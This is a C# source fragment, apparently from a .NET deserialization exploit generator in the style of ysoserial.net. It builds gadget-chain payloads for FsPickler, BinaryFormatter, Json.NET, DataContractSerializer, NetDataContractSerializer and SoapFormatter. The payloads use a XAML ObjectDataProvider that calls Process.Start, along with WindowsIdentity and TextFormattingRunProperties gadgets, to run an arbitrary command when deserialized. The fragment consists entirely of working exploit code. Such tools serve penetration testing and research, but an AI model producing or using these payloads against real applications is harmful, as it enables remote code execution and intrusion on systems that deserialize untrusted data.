$@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>"; } String internalPayload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{d:Type c:Process}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>"; internalPayload = CommandArgSplitter.JsonStringEscape(internalPayload); String payload = @"{ ""FsPickler"": ""4.0.0"", ""type"": ""System.Object"", ""value"": { ""_flags"": ""subtype"", ""subtype"": { ""Case"": ""NamedType"", ""Name"": ""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"", ""Assembly"": { ""Name"": ""Microsoft.PowerShell.Editor"", ""Version"": ""3.0.0.0"", ""Culture"": ""neutral"", ""PublicKeyToken"": ""31bf3856ad364e35"" } }, ""instance"": { ""serializationEntries"": [ { ""Name"": ""ForegroundBrush"", ""Type"": { ""Case"": ""NamedType"", ""Name"": ""System.String"", ""Assembly"": { ""Name"": ""mscorlib"", ""Version"": ""4.0.0.0"", ""Culture"": ""neutral"", ""PublicKeyToken"": ""b77a5c561934e089"" } }, ""Value"": """ + internalPayload + @""" } ] } } }"; if (inputArgs.Minify) { payload = JSONMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { var serializer = MBrace.CsPickler.CsPickler.CreateJsonSerializer(true); serializer.UnPickleOfString <Object>(payload); } catch { } } return(payload); } else { throw new Exception("Formatter not supported"); } }
public override object Generate(string formatter, InputArgs inputArgs) { Generator generator = new TextFormattingRunPropertiesGenerator(); byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs); string b64encoded = Convert.ToBase64String(binaryFormatterPayload); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("objectstateformatter", StringComparison.OrdinalIgnoreCase)) { var obj = new IdentityMarshal(b64encoded); return(Serialize(obj, formatter, inputArgs)); } else if (formatter.ToLower().Equals("json.net")) { string payload = @"{ '$type': 'System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'System.Security.ClaimsIdentity.actor': '" + b64encoded + @"' }"; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = JSONMinifier.Minify(payload, new string[] { "mscorlib" }, null); } else { payload = JSONMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.JsonNet_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer")) { string payload = $@"<root type=""System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <WindowsIdentity xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Security.Principal""> <System.Security.ClaimsIdentity.actor i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor> </WindowsIdentity> </root> "; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null); } else { payload = XMLMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("netdatacontractserializer")) { string payload = $@"<root> <w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" z:Type=""System.Security.Principal.WindowsIdentity"" z:Assembly=""mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""""> <System.Security.ClaimsIdentity.actor z:Type=""System.String"" z:Assembly=""0"" >{b64encoded}</System.Security.ClaimsIdentity.actor> </w> </root> "; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null); } else { payload = XMLMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.NetDataContractSerializer_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("soapformatter")) { string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""> <SOAP-ENV:Body> <a1:WindowsIdentity id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <System.Security.ClaimsIdentity.actor xsi:type=""xsd:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor> </a1:WindowsIdentity> </SOAP-ENV:Body> </SOAP-ENV:Envelope> "; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null, FormatterType.SoapFormatter); } else { payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter); } } if (inputArgs.Test) { try { SerializersHelper.SoapFormatter_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else { throw new Exception("Formatter not supported"); } }